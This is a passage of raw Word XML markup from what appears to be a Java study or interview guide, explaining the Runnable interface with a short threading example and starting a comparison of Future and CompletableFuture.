        </w:rPr>
        <w:t xml:space="preserve"> interface is a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>functional interface</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> in Java, designed to represent a task that can be executed by a thread. It is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>java.lang</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> package</w:t>
      </w:r>
      <w:r w:rsidR="002F141B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36ADC7BF" w14:textId="77777777" w:rsidR="002F141B" w:rsidRPr="00CE4B95" w:rsidRDefault="002F141B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Runnable is used to execute code concurrently in threads.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E75ABD2" w14:textId="77777777" w:rsidR="002F141B" w:rsidRPr="00CE4B95" w:rsidRDefault="002F141B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">It does </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>not return a value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>cannot throw checked exceptions</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CECB395" w14:textId="05E1B1FB" w:rsidR="002F141B" w:rsidRPr="00CE4B95" w:rsidRDefault="002F141B">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="27"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Often used when the task is simple and doesn't need a return result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B685E9B" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14" w:rsidP="00627C14">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:ascii="Segoe UI Emoji" w:hAnsi="Segoe UI Emoji" w:cs="Segoe UI Emoji"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>✅</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> Key Features of Runnable:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E020699" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Single Abstract Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC3EE73" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>void run();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D9FADEE" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Contains no parameters and does not return any result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21E082EB" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Used to Define a Thread Task</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D0B23CC" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Runnable is often used to define the code that should execute in a separate thread.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F692C50" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Does Not Return a Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30D5E5C9" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Unlike Callable, it doesn’t return any result or throw checked exceptions.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3B374ACD" w14:textId="77777777" w:rsidR="00A43A45" w:rsidRPr="00CE4B95" w:rsidRDefault="00A43A45" w:rsidP="00A43A45">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18DD1914" w14:textId="77777777" w:rsidR="00627C14" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Can Be Passed to a Thread</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7517CB8F" w14:textId="25233AB0" w:rsidR="00002561" w:rsidRPr="00CE4B95" w:rsidRDefault="00627C14">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="26"/>
        </w:numPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>You can pass an instance of Runnable to a Thread constructor.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BB07BEE" w14:textId="2B1D7006" w:rsidR="00002561" w:rsidRPr="00CE4B95" w:rsidRDefault="00002561" w:rsidP="00002561">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="060FE840" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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Runnab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mplement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unnab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B4D91C1" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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59DD5CEC" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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ru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C42B256" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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Running in a thread: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urrentThrea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Name</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45C05699" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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EC6FEC0" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3327FD6B" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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031BA7B" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> threa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Runnable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECBB489" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        threa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art</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57D9B9EB" w14:textId="77777777" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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F30596A" w14:textId="112592C2" w:rsidR="0059658D" w:rsidRPr="00CE4B95"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CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1057FFBC" w14:textId="12B6AA6C" w:rsidR="00525850" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
        <w:pict w14:anchorId="47F4BAFF">
          <v:rect id="_x0000_i1875" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="1AFA9C1A" w14:textId="424DC926" w:rsidR="00525850" w:rsidRPr="00CE4B95" w:rsidRDefault="00525850" w:rsidP="00525850">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="299" w:name="_Toc196307779"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Difference between Future and CompletableFuture?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="299"/>
    </w:p>
    <w:p w14:paraId="45E835A6" w14:textId="3B5799B7" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="003577E7">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main difference between Future and CompletableFuture in Java lies in their capabilities and flexibility when working with asynchronous tasks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="785EFAEA" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Basic Overview:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECCEC80"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uture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4699D054" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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presents a task that will eventually complete and produce a result.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15D9FAAA" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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is </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: You can get the result using methods like get(), but it will block the calling thread until the task completes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6671FE8F"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letableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3E3F93A2" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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subclass of Future that allows you to write </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> asynchronous code.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="280F85F8" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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can be </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>explicitly completed</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (via complete()) and can be used to </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>compose asynchronous tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> without blocking.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="769345F2" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Asynchronous Composition:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AEF405D"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uture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1784F58C" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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oes not support chaining or combining asynchronous tasks</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. It only allows the retrieval of the result via blocking calls (e.g., get()).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62CCB374"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letableFuture:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620D60CD" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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upports chaining</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> of multiple asynchronous tasks via methods like thenApply(), thenAccept(), and thenCombine().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DB99E4F" w14:textId="77777777" w:rsidR="00577B4D" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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can </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>combine multiple futures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> into one using methods like thenCombine(), thenCompose(), and handle exceptions with exceptionally() or handle().</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E6F136E" w14:textId="3BC633AF" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="19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lastRenderedPageBreak/>
        <w:t>Non-blocking</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> methods that return a CompletableFuture allow you to write cleaner asynchronous workflows.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36495334" w14:textId="77777777" w:rsidR="00DF3506" w:rsidRPr="00CE4B95" w:rsidRDefault="00DF3506" w:rsidP="00DF350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Completion:</w:t>
      </w:r>
    </w:p>
